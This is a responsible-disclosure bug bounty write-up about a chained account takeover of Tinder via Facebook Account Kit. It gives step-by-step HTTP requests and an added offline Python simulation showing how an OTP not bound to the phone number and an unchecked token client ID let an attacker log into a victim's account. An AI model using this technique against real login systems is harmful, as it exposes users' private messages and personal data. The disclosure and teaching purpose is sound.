How we hacked Tinder accounts using Facebook’s Account Kit and earned $6,250 in bounties

Anand Prakash
February 20th, 2018 · 2 min read

This is being published with Facebook's permission under its responsible disclosure policy.

The vulnerabilities described in this post were fixed quickly by the Facebook and Tinder engineering teams.

This post is about an account takeover vulnerability we discovered in Tinder's application. By exploiting it, an attacker could have gained access to the Tinder account of any victim who logged in with their phone number.

The takeover chained a weakness in Tinder's login API with a vulnerability in Facebook's Account Kit, which Facebook has since fixed.

Both Tinder's web and mobile applications let users log in with their mobile phone number, and that phone login is provided by Facebook's Account Kit.

[Image: login service powered by Facebook's Account Kit on Tinder]

The user clicks "Login with Phone Number" on tinder.com and is redirected to accountkit.com to authenticate. If authentication succeeds, Account Kit hands an access token back to Tinder, which uses it to log the user in.

Interestingly, the Tinder API did not check the client ID (the app the token was issued for) on the token it received from Account Kit.

This meant an attacker could present an Account Kit access token issued for any other app, and Tinder would accept it to log into the real Tinder account of the user the token belonged to.

Vulnerability Description

Account Kit is a Facebook product that lets people register for and log in to apps integrated with it using only their phone number or email address, without a password. It is reliable, easy to use, and gives users a choice of how they sign up for apps.

Tinder is a location-based mobile app for searching and meeting new people. It allows users to like or dislike other users, and then proceed to a chat if both parties swiped right.

There was a vulnerability in Account Kit through which an attacker could have logged into any user's Account Kit account knowing only their phone number. Once in, the attacker could obtain the user's Account Kit access token from the session cookies (the "aks" cookie).

The attacker could then present that "aks" access token to the vulnerable Tinder login API and be logged into the user's Tinder account.

How the exploit worked, step by step

Step #1

First, the attacker logs into the victim's Account Kit account by putting the victim's phone number in the "new_phone_number" field of the API request shown below.

Account Kit was not verifying that the one-time password matched the phone number it had been sent to. The attacker could request a confirmation code for their own number, then submit that code (with their own "update_request_code") together with the victim's phone number, and simply be logged into the victim's Account Kit account.

The attacker then copies the victim's "aks" access token of the Account Kit app from the cookies.

The vulnerable Account Kit API (the victim's number, the attacker's request code and the attacker's own confirmation code are all sent in one request):

```http
POST /update/async/phone/confirm/?dpr=2 HTTP/1.1
Host: www.accountkit.com

new_phone_number=[victim's phone number]&update_request_code=c1fb2e919bb33a076a7c6fe4a9fbfa97[attacker's request code]&confirmation_code=258822[attacker's code]&__user=0&__a=1&__dyn=&__req=6&__be=-1&__pc=PHASED%3ADEFAULT&__rev=3496767&fb_dtsg=&jazoest=
```

Step #2

Now the attacker replays the following request to the Tinder API, placing the victim's copied "aks" access token in the "token" field.

The response logs them into the victim's Tinder account, giving the attacker full control over it: they could read private chats and full personal information, and swipe other users' profiles left or right, among other things.

Vulnerable Tinder API:

```http
POST /v2/auth/login/accountkit?locale=en HTTP/1.1
Host: api.gotinder.com
Connection: close
Content-Length: 185
Origin: https://tinder.com
app-version: 1000000
platform: web
User-Agent: Mozilla/5.0 (Macintosh)
content-type: application/json
Accept: */*
Referer: https://tinder.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{"token":"xxx","id":""}
```
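To make the two missing checks concrete, here is an added toy model of both endpoints from Step 1 and Step 2 that replays the chain offline. It is not code from the original post, Facebook or Tinder: the class and function names, the app identifiers (`TINDER_APP_ID`, `OTHER_APP_ID`), the phone numbers and the shape of the token lookup response are all assumptions made for illustration. `bind_code_to_phone` models the Account Kit fix (the OTP must have been sent to the number being confirmed) and `check_client_id` models the Tinder fix (the token must have been issued for Tinder's own app); the attack only succeeds when both checks are off.

```python
"""Toy model of the Tinder / Account Kit takeover chain (added example).

Not code from Facebook, Tinder or the original post. All identifiers, numbers
and the token-lookup response shape are assumed; no real service is contacted.
"""
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

TINDER_APP_ID = "tinder-app"    # assumed id of the Account Kit app Tinder registered
OTHER_APP_ID = "attacker-app"   # assumed id of some other Account Kit app


@dataclass
class AccountKit:
    """Stand-in for the phone-confirmation flow on accountkit.com."""
    bind_code_to_phone: bool
    # update_request_code -> (phone the code was sent to, confirmation code)
    pending: Dict[str, Tuple[str, str]] = field(default_factory=dict)
    # aks token -> (phone number, app id the token was issued for)
    sessions: Dict[str, Tuple[str, str]] = field(default_factory=dict)

    def send_code(self, phone: str) -> Tuple[str, str]:
        """Issue an OTP for `phone`; returns (update_request_code, code).
        The code is returned only so the toy can stand in for the SMS."""
        request_code = secrets.token_hex(16)
        code = f"{secrets.randbelow(10**6):06d}"
        self.pending[request_code] = (phone, code)
        return request_code, code

    def confirm(self, new_phone_number: str, update_request_code: str,
                confirmation_code: str, app_id: str) -> Optional[str]:
        """Model of POST /update/async/phone/confirm. Returns an aks token or None."""
        entry = self.pending.get(update_request_code)
        if entry is None or entry[1] != confirmation_code:
            return None
        sent_to, _ = entry
        # The check Account Kit lacked: the OTP must have gone to this very number.
        if self.bind_code_to_phone and sent_to != new_phone_number:
            return None
        del self.pending[update_request_code]
        aks = secrets.token_urlsafe(24)
        self.sessions[aks] = (new_phone_number, app_id)
        return aks

    def lookup(self, aks: str) -> Optional[dict]:
        """Stand-in for resolving the token at Account Kit (response shape assumed)."""
        if aks not in self.sessions:
            return None
        phone, app_id = self.sessions[aks]
        return {"phone": {"number": phone}, "application": {"id": app_id}}


@dataclass
class Tinder:
    """Stand-in for POST /v2/auth/login/accountkit on api.gotinder.com."""
    account_kit: AccountKit
    check_client_id: bool

    def login(self, token: str) -> Optional[str]:
        """Returns the phone number of the account logged into, or None."""
        info = self.account_kit.lookup(token)
        if info is None:
            return None
        # The check Tinder lacked: the token must belong to Tinder's own app.
        if self.check_client_id and info["application"]["id"] != TINDER_APP_ID:
            return None
        return info["phone"]["number"]


def run_attack(bind_code_to_phone: bool, check_client_id: bool,
               victim_phone: str = "+15550001111",
               attacker_phone: str = "+15559998888") -> Optional[str]:
    """Replay the chain from the post. Returns the phone of the Tinder account
    the attacker ends up in, or None if either check stops the attack."""
    ak = AccountKit(bind_code_to_phone)
    tinder = Tinder(ak, check_client_id)
    # Step 1: OTP requested for the attacker's own number, but the victim's
    # number is submitted in new_phone_number with the attacker's code.
    request_code, code = ak.send_code(attacker_phone)
    aks = ak.confirm(victim_phone, request_code, code, app_id=OTHER_APP_ID)
    if aks is None:
        return None
    # Step 2: replay the aks token into Tinder's Account Kit login endpoint.
    return tinder.login(aks)


def legitimate_login(phone: str = "+15550001111") -> Optional[str]:
    """Sanity check: with both fixes on, a user confirming their own number
    through Tinder's app still logs in."""
    ak = AccountKit(bind_code_to_phone=True)
    tinder = Tinder(ak, check_client_id=True)
    request_code, code = ak.send_code(phone)
    aks = ak.confirm(phone, request_code, code, app_id=TINDER_APP_ID)
    return tinder.login(aks) if aks else None


if __name__ == "__main__":
    print("both checks off :", run_attack(False, False))   # victim's account
    print("OTP bound only  :", run_attack(True, False))    # None
    print("client id only  :", run_attack(False, True))    # None
    print("legitimate user :", legitimate_login())
```

Either fix alone breaks the chain, which is why the post credits two separate vulnerabilities: Account Kit should never have issued a session for a number the OTP was not sent to, and Tinder should have rejected any token not issued for its own Account Kit app regardless of what Account Kit did.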

Video Proof of Concept

Timeline

Both vulnerabilities were fixed quickly by Tinder and Facebook. Facebook rewarded us with $5,000 and Tinder with $1,250.

You can contact us at [email protected] or [email protected].
